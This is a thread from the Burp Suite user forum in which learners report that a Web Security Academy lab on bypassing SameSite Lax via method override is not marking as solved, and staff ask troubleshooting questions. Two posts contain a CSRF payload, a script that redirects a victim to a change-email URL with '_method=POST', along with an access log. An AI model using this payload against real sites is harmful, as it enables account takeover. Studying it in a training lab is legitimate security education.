Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

SameSite Lax bypass via method override Lab Broken

Z3r0 | Last updated: Jul 13, 2024 03:59PM UTC

This lab is broken, when sending the payload to the victim (the correct one listed in the solution and with a different mail) the victim simply does not visit it as you can see in the access log as I don't see an IP address other than my own. I have tried to restart the lab and changing the browser but it doesn't work either. - Payload ``` <html> <body> <script> document.location="https://0ab600b403cffccd80ba7c7b008700a5.web-security-academy.net/my-account/change-email?email=abcd%40gmail.com&_method=POST" </script> </body> </html> ``` - Access log ``` MY_IP 2024-07-13 15:49:39 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:49:40 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:13 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:13 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:15 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:15 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:20 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:20 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:26 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:26 +0000 "GET /log HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:50:26 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:53:49 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:18 +0000 "POST / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:18 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:20 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:20 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:25 +0000 "GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:25 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" MY_IP 2024-07-13 15:54:58 +0000 "POST / HTTP/1.1" 302 "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" ```

Ben, PortSwigger Agent | Last updated: Jul 15, 2024 01:00PM UTC

Hi, If you use a standard version of Chrome, does this then allow you to solve this particular lab?

Z3r0 | Last updated: Jul 23, 2024 06:51PM UTC

Same thing

Ben, PortSwigger Agent | Last updated: Jul 24, 2024 07:36AM UTC

Hi, Are you able to provide us with some details of the payload and browser you are using?

Haxmaul | Last updated: Aug 29, 2024 05:23PM UTC

Mine shows delivered to victim but still not getting the Solved check mark. No issues with other labs so far. Anyone figure this out? Tested using Burps browser and my chrome (Version 128.0.6613.114 (Official Build) (64-bit)) when I "view exploit" it updates my email as it should. <html> <body> <script> document.location="https://0a4a00b803a634ed819fa1bb01cf0061.web-security-academy.net/my-account/change-email?email=3abcdfghertfg%40gmail.com&_method=POST" </script> </body> </html>

Dominyque, PortSwigger Agent | Last updated: Aug 30, 2024 09:15AM UTC

Hi Haxmaul, If you do not URL encode the email address, does this then work? Additionally, are you categorically sure that you are changing the email address in your exploit, after you view the exploit and before delivering it to the victim?

Haxmaul | Last updated: Aug 30, 2024 06:07PM UTC